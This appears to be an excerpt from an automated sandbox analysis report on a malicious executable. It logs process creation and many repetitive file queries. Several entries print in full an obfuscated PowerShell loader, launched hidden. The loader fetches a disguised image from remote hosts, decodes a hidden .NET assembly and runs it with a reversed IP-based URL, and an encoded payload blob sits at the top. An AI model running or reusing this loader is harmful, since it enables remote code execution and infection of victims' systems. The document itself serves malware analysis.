@bj@g4@z@bl@hg@i@@t@gc@zq@g@d@@i@@t@ge@bgbk@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@gc@d@@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@p@c@@ew@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@cs@pq@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@lgbm@gu@bgbn@hq@a@@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@ygbh@hm@zq@2@dq@t@bl@g4@zwb0@gg@i@@9@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@d
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.chafamk/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zgbn@gg@z@@v@gy@zwbk@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@c4@agbw@gc@pw@1@de@nw@2@de@mw@n@cw@i@@n@gg@d@@z@du@lwbu@ge@bgbv@c8@cgbl@gy@cw@v@gg@zqbh@gq@cw@v@g0@yqbp@g4@lwbu@gu@dwbf@gk@bqbn@de@mg@z@c4@agbw@gc@jw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@pq@g@eq@bwb3@g4@b@bv@ge@z@be@ge@d@bh@ey@cgbv@g0@t@bp@g4@awbz@c@@j@bs@gk@bgbr@hm@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@c0@bgbl@c@@j@bu@hu@b@bs@ck@i@b7@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@g@d0@i@bb@fm@eqbz@hq@zqbt@c4@v@bl@hg@d@@u@eu@bgbj@g8@z@bp@g4@zwbd@do@ogbv@fq@rg@4@c4@rwbl@hq@uwb0@hi@aqbu@gc@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbt@fq@qqbs@fq@pg@+@cc@ow@g@cq@zqbu@gq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@eu@tgbe@d4@pg@n@ds@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@hm@d@bh@hi@d@bg@gw@yqbn@ck@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@zqbu@gq@rgbs@ge@zw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@t@gc@zq@g@d@@i@@t@ge@bgbk@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@gc@d@@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@p@c@@ew@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@cs@pq@g@cq@cwb0@ge@cgb0@ey@b@bh@gc@lgbm@gu@bgbn@hq@a@@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@ygbh@hm@zq@2@dq@t@bl@g4@zwb0@gg@i@@9@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@t@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@dJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.chafamk/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319111CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7319111CC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
